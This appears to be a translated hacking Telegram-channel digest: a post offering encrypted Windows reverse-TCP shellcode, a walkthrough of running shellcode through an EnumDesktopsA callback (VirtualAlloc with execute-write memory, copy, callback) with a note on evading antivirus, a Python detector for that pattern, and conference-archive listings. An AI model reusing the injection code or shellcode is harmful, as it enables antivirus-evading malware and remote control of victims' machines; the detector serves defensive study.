|List of tags|#tails #whonix #qubeOS #tor #anonymity #security #deanonymization #decrypt #decipher #CSA #CISA #FBI #wireshark #privacy #https #appsec #forensics #course #collection #investigation #android #cve #bootkit #exploitation #sandbox #hacking #cheatsheet #searchEngine #duckduckgo #ezine #news #infosec #appsec #malware #security #cryptography #Shellcode #privilegeelevation #veracrypt #antiforensics #leak #exploitDev #LKM #chromium #Edge #dump #extract #edr #poc #NSA #FBI #GRU #cryptography #phishing #vm #stealer #escapeVM #iot #mobileCommunication #gsm #ss7 #3g #gps #LTE #5G #sms #xmr #RCE #2FA #SE #bypass #VMware #OS #XDR #EDR #networks #smartcard #shizo #i2p #BTC #google #car #hackrf #vpn #meshNetworking #exploit #ransomware #decrypt #messenger #searchEngine #reverseshell #RAT #cryptocurrency #Ethereum #ICS #course #stealing #geolocation #automotive #mfa #book #backdoor #identification #av #deobfuscation #powershell #reverseShell #rootkit #ATM #nix #vulnerability #censorship #telegram #fingerprint #IP #obfs4 #cryptocurrency #xmr #p2p #freenet #malware #extension #osint #addon #spoof #fingerprint #router #PRC #sim #cellularCommunication #vpn #simjacker #mfa #cybersec #timeAttack #zer0day #chromium
|Win32 Encrypted/encoded reverse tcp Shellcode|
🛡For educational purposes only!
Shellcode author: Xenofon Vassilakopoulos
🦠Shellcode for x86 Windows (reverse TCP to 192.168.201.11:4444), encrypted/encoded with the XDNR crypter (XOR/DEC/NOT/ROR). He also has a tool for decrypting and executing XDNR-encrypted/encoded shellcodes.
This is how it is compiled:
cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcrevenc.cpp /link /OUT:revenc.exe /SUBSYSTEM:CONSOLE /MACHINE:x86
And here is the series of articles by the shellcode's author on how it was written:
🖊Win32 reverse shellcode - pt .1 - Locating the kernelbase.dll address
🖊Win32 reverse shellcode - pt .2 - locating the Export Directory Table
🖊Win32 reverse shellcode - pt .3 - Constructing the reverse shellcode
⬇️The encrypted and the raw shellcode are attached below ⬇️
#Shellcode
|Run shellcode via EnumDesktopsA|
🤙Shizo is in touch!
🛡For educational purposes only!
🦠An article by cocomelonc, well known in narrow circles (on the channel: AV engines evasion, Malware development: persistence), about running shellcode via EnumDesktopsA, from the "Malware development tricks" series.
Previous ones from the series:
💥Download & inject logic + source code
💥Find kernel32.dll base: asm style + source code
The EnumDesktopsA function itself exists to pass the name of each desktop to an application-defined callback function; it is declared in the winuser.h header. It can only enumerate desktops for which the calling process has the DESKTOP_ENUMERATE access right.
Of course, the program is in C++, my favourite and at the same time most hated language.
To run the shellcode, besides having it, we first need to allocate a memory buffer (or "reserve" one, whichever way you put it) with VirtualAlloc:
LPVOID mem = VirtualAlloc(NULL, sizeof(my_payload), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
In case anyone is curious, LPVOID is a pointer to any type, defined in the WinDef.h header:
typedef void *LPVOID;
Next, we need to "copy" our payload (the shellcode) into that memory region:
RtlMoveMemory(mem, my_payload, sizeof(my_payload));
After that, in EnumDesktopsA we pass that memory region as the pointer to the callback function:
EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, NULL);
my_payload, in case anyone hasn't understood, is just our payload.
Detection: 16/66 (Windows Defender does not detect it)
📝The source code is here.
#malware #shellcode #injection
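The call sequence the post walks through (an allocation that is executable and writable at once, a copy into it, then a Win32 API handed that region as its callback pointer) is exactly the pattern a defender can look for in an API trace. Below is an added example, not code from the post or from cocomelonc's repository: a Python scanner that reads constructed API-monitor-style trace lines (the line format, the addresses, the SAMPLE_TRACE calls and the helper names such as scan_trace are all invented for this example, not the output of any real tool), tracks regions allocated with an executable-and-writable protection, and flags any later call that passes a pointer into such a region as an argument. It is written to catch the general pattern, so it would flag any other callback-taking API used the same way, not just EnumDesktopsA.

```python
import re
from dataclasses import dataclass

# Constructed sample trace in an API-monitor-like format (invented for this
# example, not real tool output). Lines 1-4 replay the sequence from the post;
# lines 5-6 are a benign allocation and a benign EnumDesktopsA call for contrast.
SAMPLE_TRACE = """\
VirtualAlloc(lpAddress=0x0, dwSize=0x13f, flAllocationType=MEM_COMMIT, flProtect=PAGE_EXECUTE_READWRITE) -> 0x1f0000
RtlMoveMemory(Destination=0x1f0000, Source=0x40a000, Length=0x13f)
GetProcessWindowStation() -> 0x44
EnumDesktopsA(hWinStation=0x44, lpEnumFunc=0x1f0000, lParam=0x0) -> 1
VirtualAlloc(lpAddress=0x0, dwSize=0x1000, flAllocationType=MEM_COMMIT, flProtect=PAGE_READWRITE) -> 0x2a0000
EnumDesktopsA(hWinStation=0x44, lpEnumFunc=0x401230, lParam=0x0) -> 1
"""

CALL_RE = re.compile(r"^(\w+)\((.*)\)(?:\s*->\s*(\S+))?$")
ARG_RE = re.compile(r"(\w+)=([^,\s]+)")

# Primitives that create or fill the region are tracked, not flagged:
# the signal is a *different* API later receiving a pointer into that region.
ALLOC_APIS = {"VirtualAlloc", "VirtualAllocEx"}
COPY_APIS = {"RtlMoveMemory", "RtlCopyMemory", "memcpy", "WriteProcessMemory"}
COPY_DEST_PARAMS = ("Destination", "lpBaseAddress", "dest")


@dataclass
class Region:
    base: int
    size: int
    written: bool = False  # set once a copy primitive targets the region

    def contains(self, addr: int) -> bool:
        return self.base <= addr < self.base + self.size


def to_int(text):
    """Parse a hex or decimal literal; None for symbolic values such as MEM_COMMIT."""
    try:
        return int(text, 0)
    except (TypeError, ValueError):
        return None


def parse_line(line):
    """Split 'Api(name=value, ...) -> ret' into (api, {name: value}, ret or None)."""
    m = CALL_RE.match(line.strip())
    if not m:
        return None
    api, args, ret = m.groups()
    return api, dict(ARG_RE.findall(args)), ret


def is_exec_writable(protection: str) -> bool:
    # PAGE_EXECUTE_READWRITE / PAGE_EXECUTE_WRITECOPY: executable and writable at once.
    return "EXECUTE" in protection and "WRITE" in protection


def scan_trace(text: str):
    """Return one finding per argument that points into an executable+writable allocation."""
    regions = []
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        parsed = parse_line(line)
        if parsed is None:
            continue
        api, args, ret = parsed
        if api in ALLOC_APIS:
            base, size = to_int(ret), to_int(args.get("dwSize"))
            if base and size and is_exec_writable(args.get("flProtect", "")):
                regions.append(Region(base, size))
            continue
        if api in COPY_APIS:
            dst = next((to_int(args[p]) for p in COPY_DEST_PARAMS if p in args), None)
            for r in regions:
                if dst is not None and r.contains(dst):
                    r.written = True
            continue
        # Any other API: every numeric argument is checked against the tracked regions.
        for name, value in args.items():
            addr = to_int(value)
            if addr is None:
                continue
            for r in regions:
                if r.contains(addr):
                    findings.append({
                        "line": lineno, "api": api, "param": name, "address": addr,
                        "region_base": r.base, "region_written": r.written,
                    })
    return findings


if __name__ == "__main__":
    for f in scan_trace(SAMPLE_TRACE):
        print(f"line {f['line']}: {f['api']}({f['param']}=0x{f['address']:x}) points into "
              f"RWX region 0x{f['region_base']:x} (written to: {f['region_written']})")
```

On the sample trace only the fourth line is reported: lpEnumFunc lands in the PAGE_EXECUTE_READWRITE region that was allocated and then filled, while the second EnumDesktopsA call, whose callback sits in the program's own image, passes. On a live system the equivalent check is VirtualQuery on the callback target: a legitimate callback lives in a mapped image (MEMORY_BASIC_INFORMATION.Type == MEM_IMAGE), whereas the pointer from the post lands in private, committed, PAGE_EXECUTE_READWRITE memory.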
HITB2023AMS.zip (232.2 MB)
🗃Your humble servant downloaded all presentations currently available from Hack In The Box 2023 Amsterdam and packed them into an archive.
#HITB2023 #security #API #AV #Fingerprinting #Honeypots #PostExploitation #hacking #shellcode #iOS #windows #malware #bugs #WAN #LAN #AntiCensorship #obfuscation #virtualization #XRP
BHasia2023.zip (914.5 MB)
🗃Your humble servant downloaded all presentations currently available from Black Hat Asia 2023 and packed them into an archive.
#BHasia #security #Bugs #exploitation #cryptography #Kernel #linux #ebpf #IoT #APT #espionage #CTI #DFIR #malware #privacy #mobile #GooglePixel #Rooting #Android #RF #HW #FW #RE #LockPick #JS #PrototypePollution #RCE #InsiderThreats #TTP #PMFault #FaultInjection #Windows #PPL #ransomware #AI #ML #DataScience #detection #OT #PLCs #RTUs #Schneider #LateralMovement #Arm #CodeInjection #WiFi #WPA3 #MCU #SCA #TimingAttacks #Chrome #fuzzing #WebSQL #hybridWar #Java #Gadgets_SSRF_RCE #EPZ #NTFS #LPE #Webkit #WASM #DNS #CFG #ETW #Shellcode #immutableCode #supplyChainAttacks #CriticalInfrastructure #IIoT
BHasia2023ToolsPoCs.zip (4.4 MB)
🧰Some of the Black Hat Asia 2023 talks came with tools and PoCs; I downloaded those too and packed them into an archive (inside there is a text file, "List.txt", with links to them and the titles of the talks they were presented with).
#BHasiaTools #security #Graph #TTPs #exploitation #RE #Arm #CodeInjection #Network #cryptography #WiFi #WiFi_Framework #transmitQueueManipulations #clientIsolationBypasses #intercept #MAC #browsers #WebAssembly #WebKit #fuzzing #XMap #ZMap #ICMP #EchoScans #TCP_SYN_scans #UDPprobes #DNS #malware #Shellcode #memory_scanning #CFG_bitmap #ETW #kernel_telemetry
💥After a while, recordings of the talks from Hack In The Box 2023 Amsterdam appeared, so I attach below a list of links to them.
📺 XRP Raid Protector: Killing A Critical Bug Worth 40 Billion Dollars
📺 Current State Of IOS Malware Detection
📺 Nakatomi Space: Lateral Movement As L1 Post-Exploitation In OT
📺 Syscalls In Shellcode: Techniques For Malicious Functionality
📺 SOHO Hacking At Pwn2Own
📺 Next Generation Virtualization-Based Obfuscators
📺 Bypassing Anti-Cheats And Hacking Competitive Games
📺 Advanced DMA Reentrancy Techniques To Escape QEMU
📺 A Tale Of Building A REAL Full Speed Anti-Censorship Router
📺 Hunting Windows Desktop Window Manager Bugs
📺 ChatGPT Please Write Me A Piece Of Polymorphic Malware
📺 Automated Black-box Security Testing Of “Smart” Embedded Devices
📺 How MySQL Servers Can Attack YOU
📺 PANEL DISCUSSION: iOS / OS X Security
📺 A Deep Dive Into GarminOS And Its MonkeyC Virtual Machine
📺 Active Directory Abuse Primitives And Operation Security
📺 Smart Speaker Shenanigans: Making The SONOS One Sing
📺 Exploiting IPC With New Desynchronization Primitives
📺 CLOSING KEYNOTE - The Hand That Strikes, Also Blocks
📺 Investigating Web3 With OSINT
📺 An Analysis Of Computer Numerical Control Machines In Industry 4.0
📺 Privilege Escalation Using DOP In MacOS
#HITB2023 #security #API #AV #Fingerprinting #Honeypots #PostExploitation #hacking #shellcode #iOS #windows #malware #bugs #WAN #LAN #AntiCensorship #obfuscation #virtualization #XRP #automotive #car #SDR #RFanalysis #MySQL #RedTeam #infrastructure #DMA #QemuEscape #exploitation #Embedded #fw #fuzzing #Ghidra #Gophers #Golang #SONOS #macOS #exploitation #vulnerability #PE #DOP #ChatGPT #polymorphicMalware #KernelDrivers #GarminOS #MonkeyC #FW #VM #ICS #SupplyChain #MTConnect